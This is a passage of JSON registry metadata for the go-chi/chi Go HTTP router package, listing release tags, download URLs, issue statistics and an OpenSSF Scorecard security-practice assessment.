chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.165Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":7.859548166938148,"dependent_packages_count":6.9684164201790395,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":7.413982293558593},"purl":"pkg:golang/github.com/go-chi/ch%21i","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chI","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chI","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chI/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FchI/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FchI/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FchI/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FchI/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FchI/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FchI/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3557992,"name":"gopkg.in/go-chi/chi.v4","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in/go-chi","versions_count":11,"first_release_published_at":"2019-01-08T22:33:15.000Z","latest_release_published_at":"2023-09-07T09:47:57.000Z","latest_release_number":"v4.1.3","last_synced_at":"2026-08-12T02:06:17.436Z","created_at":"2022-04-11T01:43:55.429Z","updated_at":"2026-08-12T02:06:17.436Z","registry_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v4","install_command":"go get gopkg.in/go-chi/chi.v4","documentation_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v4#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8a